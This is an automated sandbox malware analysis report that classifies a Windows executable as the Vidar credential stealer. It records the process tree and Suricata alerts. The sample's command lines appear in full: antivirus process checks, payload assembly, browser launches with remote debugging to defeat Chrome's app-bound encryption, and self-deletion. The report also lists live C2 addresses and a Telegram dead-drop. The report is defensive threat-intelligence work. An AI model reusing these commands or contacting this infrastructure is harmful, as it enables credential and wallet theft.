Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6684V5n83w.exe

Overview

General Information

Sample name:6684V5n83w.exe
renamed because original name is a hash value
Original sample name:53c60d599aa498ed4efa79ba0b12e29f.exe
Analysis ID:1582695
MD5:53c60d599aa498ed4efa79ba0b12e29f
SHA1:969a751e4c24b9e4487ff62908b230dd554a2acc
SHA256:8dcce53ea838f3f97b8aff36e0a1ffd70aeb1de6b8c6e5d6b530499a07e59fce
Tags:exeuser-abuse_ch
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
AI detected suspicious sample
Drops PE files with a suspicious file extension
Monitors registry run keys for changes
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Uses 32bit PE files

Classification

  • System is w10x64
  • 6684V5n83w.exe (PID: 5528 cmdline: "C:\Users\user\Desktop\6684V5n83w.exe" MD5: 53C60D599AA498ED4EFA79BA0B12E29F)
    • cmd.exe (PID: 4308 cmdline: "C:\Windows\System32\cmd.exe" /c move Focused Focused.cmd & Focused.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3440 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2136 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7092 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3920 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 4292 cmdline: cmd /c md 330775 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 6156 cmdline: extrac32 /Y /E Modules MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 3168 cmdline: findstr /V "however" Hotel MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 4416 cmdline: cmd /c copy /b 330775\Evans.com + Presentation + Univ + Gmc + Underground + Rd + Burns + Riders + Dp + Finish + Entities + Cleveland 330775\Evans.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 4984 cmdline: cmd /c copy /b ..\Delivering + ..\Wisdom + ..\Spare + ..\Earrings + ..\Grey + ..\Bus + ..\Project l MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Evans.com (PID: 2656 cmdline: Evans.com l MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 1536 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 6276 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2068,i,3099484482751593606,10427139142014003377,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • msedge.exe (PID: 1436 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 6472 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2692 --field-trial-handle=2548,i,2148176420882130604,12860696726209298526,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • cmd.exe (PID: 7256 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com" & rd /s /q "C:\ProgramData\kno8y" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 6380 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 3788 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 6484 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6308 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=2012,i,13447073896792857968,5768153646567357744,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7208 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6860 --field-trial-handle=2012,i,13447073896792857968,5768153646567357744,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7216 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7024 --field-trial-handle=2012,i,13447073896792857968,5768153646567357744,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Evans.com l, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com, ParentProcessId: 2656, ParentProcessName: Evans.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 1536, ProcessName: chrome.exe

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Focused Focused.cmd & Focused.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4308, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 3920, ProcessName: findstr.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-31T09:46:09.022559+010020442471Malware Command and Control Activity Detected116.203.14.4443192.168.2.549993TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-31T09:46:10.344648+010020518311Malware Command and Control Activity Detected116.203.14.4443192.168.2.549995TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-31T09:46:10.344422+010020490871A Network Trojan was detected192.168.2.549995116.203.14.4443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-31T09:46:06.356202+010028593781Malware Command and Control Activity Detected192.168.2.549990116.203.14.4443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 6684V5n83w.exeReversingLabs: Detection: 23%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
    Source: 6684V5n83w.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49752 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49866 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49988 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 116.203.14.4:443 -> 192.168.2.5:49989 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49994 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50124 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50135 version: TLS 1.2
    Source: 6684V5n83w.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\6684V5n83w.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
    Source: C:\Users\user\Desktop\6684V5n83w.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
    Source: C:\Users\user\Desktop\6684V5n83w.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:49990 -> 116.203.14.4:443
    Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:49995 -> 116.203.14.4:443
    Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.14.4:443 -> 192.168.2.5:49995
    Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.14.4:443 -> 192.168.2.5:49993
    Source: global trafficHTTP traffic detected: GET /w211et HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
    Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
    Source: Joe Sandbox ViewIP Address: 108.139.47.92 108.139.47.92
    Source: Joe Sandbox ViewIP Address: 20.110.205.119 20.110.205.119
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: global trafficHTTP traffic detected: GET /w211et HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: sdoout.lolConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1735634793756&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=dc137b0ec0ad4d94aa04f3e0c0cf6381&activityId=dc137b0ec0ad4d94aa04f3e0c0cf6381&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=05F9EFDB33DC678B1BFFFABD3256667F; _EDGE_S=F=1&SID=1CCB54C755F762B91E6041A1542B63D6; _EDGE_V=1
    Source: global trafficHTTP traffic detected: GET /b?rn=1735634793756&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=05F9EFDB33DC678B1BFFFABD3256667F&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /b2?rn=1735634793756&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=05F9EFDB33DC678B1BFFFABD3256667F&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=137e5d88de79f0ec687e6aa1735634795; XID=137e5d88de79f0ec687e6aa1735634795
    Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1735634793756&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=dc137b0ec0ad4d94aa04f3e0c0cf6381&activityId=dc137b0ec0ad4d94aa04f3e0c0cf6381&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=A917510D236B4283B5F86A7AAE2621DD&MUID=05F9EFDB33DC678B1BFFFABD3256667F HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=05F9EFDB33DC678B1BFFFABD3256667F; _EDGE_S=F=1&SID=1CCB54C755F762B91E6041A1542B63D6; _EDGE_V=1; SM=T
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
    Source: 000003.log7.23.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
    Source: 000003.log7.23.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
    Source: 000003.log7.23.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
    Source: chrome.exe, 00000011.00000003.2789765310.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2790239586.0000259800FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2790710500.0000259800304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) 